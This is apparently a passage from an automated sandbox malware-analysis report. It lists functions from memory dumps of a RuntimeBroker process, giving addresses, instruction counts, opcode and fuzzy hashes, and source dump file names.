Instruction ID: 64d7b23a01dd9593fdc7426991331238fa924b3aac60bccbf39386b092c29d81
Opcode Fuzzy Hash: fe57a1a205123d309dcc7462f5674b789b70a31fc75099618420e7ca5575d486
Instruction Fuzzy Hash: 9141F970E0A64E8FEB64DFA8C4A46ED7BF1AF08300F11417AD119E72B1DB38A9448B50

Function 00007FFD9B7F7169 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7F4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7f4000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80bddbc7a0511fbabc65f40bdb393505b68dfead459460752f010ee70449a567
Instruction ID: df56444d4ea7271a88001ad5a057b8e939f63289e80279e4d58ed94062cb7cbc
Opcode Fuzzy Hash: 80bddbc7a0511fbabc65f40bdb393505b68dfead459460752f010ee70449a567
Instruction Fuzzy Hash: 0941D030F0A64E9EEB64DFA4C8656ED7BF1BF54300F01027AD408C61B6DE38AA48C781

Function 00007FFD9B7F2BC0 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7F2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7f2000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cabe2321079a32d75cec9bafef11a8177057b8e3847f3a488e01b89445f5889d
Instruction ID: 12904e4aa59457050ccd53b768927dd2711fec0536ca98ae8070a9a829d03bc9
Opcode Fuzzy Hash: cabe2321079a32d75cec9bafef11a8177057b8e3847f3a488e01b89445f5889d
Instruction Fuzzy Hash: 2841BC74E1961D8FDBA4EBA8C855BACBBB1FF55300F5041A9D00DE32A1DE346A81DB44

Function 00007FFD9B7F68B2 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7F4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7f4000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cfd35576f7fa9467b2bb322516c823bcb955a664167083ae48565f50596994e
Instruction ID: f7742547a1396178df2f5d7befa8c0eb2737b39f8cbb202654157abef117869e
Opcode Fuzzy Hash: 0cfd35576f7fa9467b2bb322516c823bcb955a664167083ae48565f50596994e
Instruction Fuzzy Hash: 27412A70E0961E8FDB68DB98C8657ECBBB1FF58311F1042B9C05D962A1CB786A81CF44

Function 00007FFD9B7F7045 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7F4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7f4000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d6b9021a9e41fbfcae33a61e8b73f6b22f3f0e42bf807c6fb13de5e738d27c6
Instruction ID: 935d4bea241b56678bbd0476c566d463dafc16ee8d558d1cd7f6e6a2bab6774c
Opcode Fuzzy Hash: 2d6b9021a9e41fbfcae33a61e8b73f6b22f3f0e42bf807c6fb13de5e738d27c6
Instruction Fuzzy Hash: 0621D131B0E74E9BEB699B6488756BD3AA0FF15300F0501BAD41DC21B2DE35A550C781

Function 00007FFD9B7F7611 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7F4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7f4000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0f42c4f6a8e4987344c7419b053377179fa9eef7e7869a6d4b38a878f397f2e
Instruction ID: 754aeecb08db65a49967350a0b4805bc4bbb33947d1675a03568e258c31f7d8b
Opcode Fuzzy Hash: d0f42c4f6a8e4987344c7419b053377179fa9eef7e7869a6d4b38a878f397f2e
Instruction Fuzzy Hash: 94218E31F0A60EAEEB61EBE888586FD7BE4FF19301F410676D419D30B1DA38A2408794

Function 00007FFD9B7F7691 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7F4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7f4000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6f9ec344653a315d949c26a0a0e31490e37c00b1e4edf956393c9b0e75f8b64
Instruction ID: c3ed461e23e572ef85d30c5c6c513bc8524e92eb49a8485fa7746f1783302146
Opcode Fuzzy Hash: f6f9ec344653a315d949c26a0a0e31490e37c00b1e4edf956393c9b0e75f8b64
Instruction Fuzzy Hash: A4214130F1964E9FEBA4EBA888686BD7BE0FF18305F41057AD41AD61B1DA74A650C740

Function 00007FFD9B7EC35E Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7ea000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c1c88daefa7a6079e3d25d2253915db046633951b545873fd77cc3ee42d9afa
Instruction ID: 5e6f4e1005cb6934183008c752fba73593db67f138580fd9de9bee821979dc25
Opcode Fuzzy Hash: 0c1c88daefa7a6079e3d25d2253915db046633951b545873fd77cc3ee42d9afa
Instruction Fuzzy Hash: 2E21E975E09A0D8EDFA4EBA8D4A56FCBBB1FF59300F515239D00DE72B2CE2469418B40

Function 00007FFD9B7EC9FB Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7ea000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c06927d52a0a0e9691fc73126532d1546cc05e048d85a8e811e7e1fabdc259b
Instruction ID: 3a6d50a6b6d766a00fe35797ddb6c45dae7bab8aa294f4fe10504018f9f72a5a
Opcode Fuzzy Hash: 7c06927d52a0a0e9691fc73126532d1546cc05e048d85a8e811e7e1fabdc259b
Instruction Fuzzy Hash: B821502AF0E79A4AE766FBF8A4294FD3760AF51329F0643B7D41DC50F6DE2825408251

Function 00007FFD9B7EB058 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7ea000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7367a619be268f333dcf8d6624f83e7cedb74b699d73b43ef945159f96403bd
Instruction ID: d3fbadada2866d748fa490093dd8573ac7756c98a7f057d4ce27ddf121aa41d5
Opcode Fuzzy Hash: f7367a619be268f333dcf8d6624f83e7cedb74b699d73b43ef945159f96403bd
Instruction Fuzzy Hash: A721A430E15A0F8EEB61EBA8C4985BDB7E1FF48310F424AB6D41DC71B5EE34B6448640

Function 00007FFD9B7E32CA Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7e0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 516e6409c22fdc9094b1bf4721f03e559cd717e807005a0a9fc53d118f35e2b2
Instruction ID: 91aaad8361790fd12c97ede4374f530faf2197d5c1dbc9c24a9c78daf3dccc4e
Opcode Fuzzy Hash: 516e6409c22fdc9094b1bf4721f03e559cd717e807005a0a9fc53d118f35e2b2
Instruction Fuzzy Hash: 5521B771E0961D8FEB64EB98C464AECBBF1FF58301F514279D009E72B1DA396A40CB10

Function 00007FFD9B7F7799 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7F4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7f4000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bc41852db8ebb3146934d7170d500ddc0b439646581c7c1369a8872a92553e4
Instruction ID: ed6241adddee665bab8b9c6209d104f1b30adb4f613a90694b580b5480626215
Opcode Fuzzy Hash: 4bc41852db8ebb3146934d7170d500ddc0b439646581c7c1369a8872a92553e4
Instruction Fuzzy Hash: AF217130F1A74E9FEB61AB6488685BD7BE0FF19304F4109B6D418C60B6EE34A6548791

Function 00007FFD9B7E2189 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7e0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5946d13f24ffb4a94d683890ed197d79af324a3da102110dd95635b62d80e417
Instruction ID: e0df19074c0011eac67cde16f334ef0f01ff7af4163e4a3b9ecc6cb724a8cf31
Opcode Fuzzy Hash: 5946d13f24ffb4a94d683890ed197d79af324a3da102110dd95635b62d80e417
Instruction Fuzzy Hash: 2611BE30F1960E8FE715EBB488699B977E0EF06304F0245F6E41DC70B6EE38AA858751

Function 00007FFD9B7F7DED Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7F4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7f4000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79a12d9a3a04fb50750c41042c4f490f09d4de9284041a7644faa7783a36c81b
Instruction ID: df316344ee0852d60976d978dd39d03b56d3bb1213a61332ca0b576513c2e1bb
Opcode Fuzzy Hash: 79a12d9a3a04fb50750c41042c4f490f09d4de9284041a7644faa7783a36c81b
Instruction Fuzzy Hash: 8221C130F5A28E9FDB689F7488655FA3BA0EF05304F4105BED41AC60F2DE34AA50C781

Function 00007FFD9B7E084D Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7e0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a55203d088d446031a6782c0a352b9e06a01e56690402e0570944de86aed70b3
Instruction ID: 37e7ff722c69514a6b34585865b6074eef317ad45f0fac11d474109ef4073a0d
Opcode Fuzzy Hash: a55203d088d446031a6782c0a352b9e06a01e56690402e0570944de86aed70b3
Instruction Fuzzy Hash: E7115731F0A64E9FE761ABB8C86A4E837E0FF01700F064676C089D60B6ED30A544C290

Function 00007FFD9B7EA691 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7ea000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2356edf798111a7b6590867de87cd85ced2a7c5ed5b95c993d6cabc764d8c715
Instruction ID: fd4cd2619a9fb5a0bd3e4dedae15f680967837f9083a0378f91af346ddd49bf6
Opcode Fuzzy Hash: 2356edf798111a7b6590867de87cd85ced2a7c5ed5b95c993d6cabc764d8c715
Instruction Fuzzy Hash: 0B216F70A0964D8FDF94EF58C8999AD3BE0FF29304F01066AE40AD7175DB34A540CB40

Function 00007FFD9B7F6F01 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7F4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7f4000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08989d2a762c99845ee09efde3b49cb91c1b1d47d7c1877b15a905011666f321
Instruction ID: d2832f83083b133c14a82c8349b12f3eeb23b0a5e0453a54628d6cd231066b0c
Opcode Fuzzy Hash: 08989d2a762c99845ee09efde3b49cb91c1b1d47d7c1877b15a905011666f321
Instruction Fuzzy Hash: C111B131E0964E8FDB98EF6884656BD3BE0FF68300F0101BAD41DC61B6DE34A540C780

Function 00007FFD9B7E0A01 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7e0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0207e83927c60a3566240f29b76792e7ec91b8000cc0e7698ca2d783ba616f92
Instruction ID: 32980cf01afd9f4aee23f9cb61ee22e9f46bbdc14813a07e6036ec27c1d1bbec
Opcode Fuzzy Hash: 0207e83927c60a3566240f29b76792e7ec91b8000cc0e7698ca2d783ba616f92
Instruction Fuzzy Hash: 65119131E1960E8FEB50EFA8C85A5BD77E1FF58740F4146B6D41CC61B6EE34A6408740

Function 00007FFD9B7F4965 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7F4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7f4000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8da4ced349677d85a2355d5e019687ce4fa30b521b8e8c9d5a22f5c9bd27d849
Instruction ID: 3ab1286b22ef0268ee793b377a0e05ac6f3df533570fc83a6c967dbfa8b3fbd0
Opcode Fuzzy Hash: 8da4ced349677d85a2355d5e019687ce4fa30b521b8e8c9d5a22f5c9bd27d849
Instruction Fuzzy Hash: 7A11AF31B0964E8FEB58EF6884A92B97BA0FF68300F0102BED41DC61A2DA34A150C781

Function 00007FFD9B7F2661 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7F2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7f2000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d59473c378db0a4cd8910eb64daff4d3e9575166ab88f9073426d1c5bb8a5362
Instruction ID: 8c97d3b41fd9ae3235cb378bdb84dbcb0a9e92bc0bda9c34a109073ae5aaf56c
Opcode Fuzzy Hash: d59473c378db0a4cd8910eb64daff4d3e9575166ab88f9073426d1c5bb8a5362
Instruction Fuzzy Hash: E4118E70A0964D8FDB58EF98C4A55F93BA1FF58304F52027EF80A936A1CB34A550CB85

Function 00007FFD9B7F6FA5 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7F4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7f4000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b16ff22e06c0a7bd553b0111a253b997c079de19b937da3639175243c9681544
Instruction ID: 6509a8d6095b32bca93839b3e523bc93fbdb3c974cdffa8a7a2f7d3db7336954
Opcode Fuzzy Hash: b16ff22e06c0a7bd553b0111a253b997c079de19b937da3639175243c9681544
Instruction Fuzzy Hash: A011D231A0974E8FDB58EF6884696BD7BE0FF58300F0102BED419C61B1DE34A150C780

Function 00007FFD9B7F48C9 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7F4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7f4000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3dd00608d715e94130a52bcf70abbdcf09bbf1ba998b0572049d5c8f6b6cb69
Instruction ID: 7c4e29f4693bd5b3676379d923368cb17ba27b4e32543b3759d13db742aa1ba3
Opcode Fuzzy Hash: c3dd00608d715e94130a52bcf70abbdcf09bbf1ba998b0572049d5c8f6b6cb69
Instruction Fuzzy Hash: AF11A231F0964E8FEB55EF6884652B93BA0FF59301F0101BED41DC71B6DA346540C781

Function 00007FFD9B7EC9D3 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7ea000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c407519f63e545b58140242c422b9c668348f5b9290701cd77317ab0dc5bd6ba
Instruction ID: 533a90015187b09196486998881ba3c5e3441dbabc23708e18a27feb44005001
Opcode Fuzzy Hash: c407519f63e545b58140242c422b9c668348f5b9290701cd77317ab0dc5bd6ba
Instruction Fuzzy Hash: 2A110439B0E79E8FD719EB68EC291F97BA0FF46221F4502BBD508C71B2DA241604C790

Function 00007FFD9B7F4E09 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7F4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7f4000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a7d91bce3ffce7c7f3764fe9bd7406b716b4cbb7ae5c67e673632c47c2d4fb9
Instruction ID: 0c7c5874d4347a2d1faa65d165ec7456ed2aac968a829748a2aec3f7be814667
Opcode Fuzzy Hash: 7a7d91bce3ffce7c7f3764fe9bd7406b716b4cbb7ae5c67e673632c47c2d4fb9
Instruction Fuzzy Hash: 2111E231F0EB8E8FEB599BA488B52B83BA1FF15304F0501BED45DC65B2CA246650C741

Function 00007FFD9B7F5179 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7F4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7f4000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3606bf83f150f24fefc5e2ea5b53564944377eb761ec5723266594b8e76af72c
Instruction ID: 140336339ba33c0c697b9d2e2106254e05b53b33efe6e60263db7b1b1c1b4d11
Opcode Fuzzy Hash: 3606bf83f150f24fefc5e2ea5b53564944377eb761ec5723266594b8e76af72c
Instruction Fuzzy Hash: 3B119D30A0AB8E8FEB55EB64C8696B97BF0FF19300F0505BAD41DC61B2DA3976408741

Function 00007FFD9B7F2A51 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7F2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7f2000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b00d9f40469d880024cb66412440fd09cee2a918250b63a957a0ce719fbac23
Instruction ID: 239c1cb3c4e9e2dd8deb098e673dfc431f0226e1c84172d333aaf5299267d358
Opcode Fuzzy Hash: 1b00d9f40469d880024cb66412440fd09cee2a918250b63a957a0ce719fbac23
Instruction Fuzzy Hash: A3019230E1D64F8FEBA1EBB888585F97BE4EF19300F4549B2E818C7076EA34A240C740

Function 00007FFD9B7F4F2D Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7F4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7f4000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47435690837c7b031f5d61e7517a48b4d6b9e5a79a2419eba58a47ee9832d80d
Instruction ID: e284ac604b993a1579fcc59c5833858cc59c93f99d1ae8c16bf8a2602d2696b4
Opcode Fuzzy Hash: 47435690837c7b031f5d61e7517a48b4d6b9e5a79a2419eba58a47ee9832d80d
Instruction Fuzzy Hash: 64119E30E0964E8FEB54EFA488696BD7BE0FF18304F4505BED41EC61A6DE34A540C741

Function 00007FFD9B7ECA50 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7ea000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1fe29bf235066e1bb28c2b5e8b82375b956c7fa00301f0cf0dd363a10a80196
Instruction ID: 969fd97acf126063a071c881853d004116aa081a10281e8c54b2586dc6c3b3ad
Opcode Fuzzy Hash: a1fe29bf235066e1bb28c2b5e8b82375b956c7fa00301f0cf0dd363a10a80196
Instruction Fuzzy Hash: 08118234A0D78E8FDB56EB7888695B97BB0FF19304F0105BBD419C71B2DA345640C750

Function 00007FFD9B7F0E61 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7f0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff2d773e862858786c27f9b619a00ba12140556ec2087f9d99528d7a42ec8d38
Instruction ID: 03fa9516d711521e691350e1a5c7e3727913ce8f975a43fb7bdbb7b940d4992d
Opcode Fuzzy Hash: ff2d773e862858786c27f9b619a00ba12140556ec2087f9d99528d7a42ec8d38
Instruction Fuzzy Hash: 3B118E70E0A64E8FEBA5EF64C8686BD7BE1FF19300F0105BAD41AC62B1DB35A650C740

Function 00007FFD9B7F70DD Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7F4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7f4000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fb288072f2a7c379c13a479b97c612480fd19460025a87f8bc3d84fa6bbabc0
Instruction ID: 730506877bda482405deb638edc0db87d73da4fe98b6e28cf4e1cdd9724fdf11
Opcode Fuzzy Hash: 7fb288072f2a7c379c13a479b97c612480fd19460025a87f8bc3d84fa6bbabc0
Instruction Fuzzy Hash: 3711C431B0A64E8FEBA8EF64C4666B97FA0EF55300F0102BAD409C61B2DE356554C781

Function 00007FFD9B7F6219 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7F4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7f4000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 069202372651d6c94bbb74f138c03ba7d0862f2ed91b90b38e7d44002b7e06c4
Instruction ID: 88e1eceb2a564f6fb5cf0ad664984e9dbf86b92b26033488d985e112f15e7382
Opcode Fuzzy Hash: 069202372651d6c94bbb74f138c03ba7d0862f2ed91b90b38e7d44002b7e06c4
Instruction Fuzzy Hash: 1F114F31E0D68E8EE751ABB488695A97BE0FF19300F0606B6D458C61B6DE34A644C751

Function 00007FFD9B7E1140 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7e0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a77c5656b5e31530022de2e0285d801d601983179ff8e1f70e812072f836f0b8
Instruction ID: 3662f187c08f0301d37186b3c001a57f64c1fc2552c126a858981d742ed6893a
Opcode Fuzzy Hash: a77c5656b5e31530022de2e0285d801d601983179ff8e1f70e812072f836f0b8
Instruction Fuzzy Hash: CA11E570E0960E8AEB68EBA8C4697BE77E0FF59304F00057EE41AD65F1DE356650C740

Function 00007FFD9B7F50ED Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7F4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7f4000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 928082ba839be1d61a7cebd21969e0b78c3b25201d21b9459b565581336413b3
Instruction ID: 535d20d7323bdb04f4f8b96857d49193a0005a5a42bb2d905b2e81b525578683
Opcode Fuzzy Hash: 928082ba839be1d61a7cebd21969e0b78c3b25201d21b9459b565581336413b3
Instruction Fuzzy Hash: 07115E31A0968E8FEB54EF64C8796B97BA0FF18304F4505BAD41DC61A6DE35B540C741

Function 00007FFD9B7E3525 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7e0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 117104bb7e47bc2dc258f78ef98701a6e387e4c40b755eedc7f7e14a3170a19f
Instruction ID: 63637bb70d3c710627f34776ef36b309318adab8ff1c568c6ed60ab475bbecdc
Opcode Fuzzy Hash: 117104bb7e47bc2dc258f78ef98701a6e387e4c40b755eedc7f7e14a3170a19f
Instruction Fuzzy Hash: 74113970E1964E8FDB55EFA8C4696BA77A0FF18304F4205BED41AC62B1DA34A640C710

Function 00007FFD9B7EC189 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7ea000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8eb274984723a4a0f164f0346e9a25235cdefb26b4975152af579cd6efcb052c
Instruction ID: 855f8c1f8a77decd88275ae311b7cb8e2169b586622f5f3720c90d28ef0be75d
Opcode Fuzzy Hash: 8eb274984723a4a0f164f0346e9a25235cdefb26b4975152af579cd6efcb052c
Instruction Fuzzy Hash: 64117C70A1974E8FDB55EF64C8686BD7BB0FF19304F4105BAE419C61B2DA34A640C700

Function 00007FFD9B7E2E61 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1860154089.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9b7e0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46e003c34abb87eadfab379bd83f30e508a70f12fc173aeff1aef0d95a9ac882
Instruction ID: d42b895d27b0795116ef2e559674f128cbf6d422844ff9b6bac5f96a165dd0e9
